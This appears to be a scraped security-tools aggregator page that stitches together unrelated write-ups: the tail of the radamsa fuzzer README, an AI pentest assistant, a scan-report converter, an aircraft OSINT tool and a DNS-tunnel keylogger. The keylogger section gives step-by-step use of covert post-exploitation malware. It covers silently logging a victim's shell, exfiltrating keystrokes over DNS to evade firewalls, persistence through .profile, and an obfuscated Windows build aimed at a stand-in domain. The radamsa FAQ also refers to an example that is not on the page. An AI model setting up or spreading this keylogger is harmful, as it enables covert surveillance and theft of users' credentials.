CVE-2012-2871 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-4922 tor found by the Tor project
CVE-2012-5108 Chrome OUSPG via NodeFuzz
CVE-2012-2887 Chrome OUSPG via NodeFuzz
CVE-2012-5120 Chrome OUSPG via NodeFuzz
CVE-2012-5121 Chrome OUSPG via NodeFuzz
CVE-2012-5145 Chrome OUSPG via NodeFuzz
CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-1691 Mozilla Firefox OUSPG
CVE-2013-1708 Mozilla Firefox OUSPG
CVE-2013-4082 Wireshark found by cons0ul
CVE-2013-1732 Mozilla Firefox OUSPG
CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3669 PHP
CVE-2014-3668 PHP
CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3707 cURL Symeon Paraschoudis
CVE-2014-7933 Chrome OUSPG
CVE-2015-0797 Mozilla Firefox OUSPG
CVE-2015-0813 Mozilla Firefox OUSPG
CVE-2015-1220 Chrome OUSPG
CVE-2015-1224 Chrome OUSPG
CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
CVE-2015-7091 Apple QuickTime Pedro Ribeiro ([email protected])
CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.

Thanks

The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

  • Darkkey
  • Branden Archer

Troubleshooting

Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

You can also drop by at #radamsa on Freenode if you have questions or feedback.

Issues in your own programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day), chances are that others will too.

Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

FAQ

Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.

Q: Will you make a graphical version of radamsa?

A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.

Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or IRC (#radamsa on freenode).

Q: I used fuzzer X and found many more bugs in program Y than Radamsa did.
A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish into radamsa if it's general purpose enough. It'd also be useful to get some of the samples you used, to check how well radamsa does, because it might be overfitting to some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track of which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
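
One way to gauge this in practice is to generate a batch of outputs and count how many are distinct. A minimal Python sketch, reusing the sample-1 file from the bc example above and assuming radamsa is installed:

import subprocess

# Generate 100 outputs with distinct seeds and count the unique ones.
outputs = {
    subprocess.run(["radamsa", "-s", str(seed), "sample-1"],
                   capture_output=True).stdout
    for seed in range(100)
}
print(len(outputs), "unique outputs out of 100")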

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.

Warnings

Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things happening. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before it is intentionally tested. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

Not safe when used as prescribed.

This product may contain faint traces of parenthesis.



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, making it a good AI assistant for your pentesting work.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse

  2. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.

OpenAI API keys

Alternatively, you can choose to use your own OpenAI API keys. To do this, simply add the argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.



Sr2T - Converts Scanning Reports To A Tabular Format


Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).

Rationale

This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

Dependencies

  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).

Install

Using Pip:

pip install --user sr2t

Usage

You can use sr2t in two ways:

  • When installed as package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to output a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
for Nessus at the moment.
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.

Example

A few examples

Nessus

To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389  | 51192     | SSL Certificate Cannot Be Trusted                                           | 2        | X           |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389  | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X

Nmap

To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164  | 445  | tcp   | microsoft-ds  | open  |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X

Nikto

To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce a text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10  | 80          | The X-Content-Type-Options header is not set. This could allow the user agent to | X           |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X

Dirble

To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order    | 0    | 0           | false        | false       | false               |              | X           |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X

Testssl

To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

Fortify

To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport            | 3.0      | 5.0        | X           |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

Donate

  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best with Python 3.

Preview

Features

skytrack features three main functions for aircraft information gathering and display. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be titled "skytrack_report.pdf".

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting between the two formats can be rather cumbersome, as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers here: https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers

Warning: the converter only works for USA-registered aircraft.

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes


This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which help prevent detection. The keylogger uses DNS tunneling/exfiltration to bypass firewalls and avoid detection.


Server

Setup

The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3 main.py

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:
ip
domain

options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.
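
For example, to listen on UDP port 5353 as the authoritative server for exfil.example.com, with the server reachable at 203.0.113.10 (hypothetical values):

python3 main.py -p 5353 203.0.113.10 exfil.example.com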

Registrar

On the registrar, you want to change your domain's nameservers to custom DNS.

Point them to two domains, ns1.example.com and ns2.example.com.

Add records that point the nameserver domains to your exfiltration server's IP address.

This is the same as setting glue records.

Client

Linux

The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

logger.sh

# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any input typed will be sent. The && exit at the end causes the shell to close on exit; without it, exiting would bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile so it starts in every new interactive shell.

connection.sh

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet

Windows

Build

To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.

make production domain=example.com

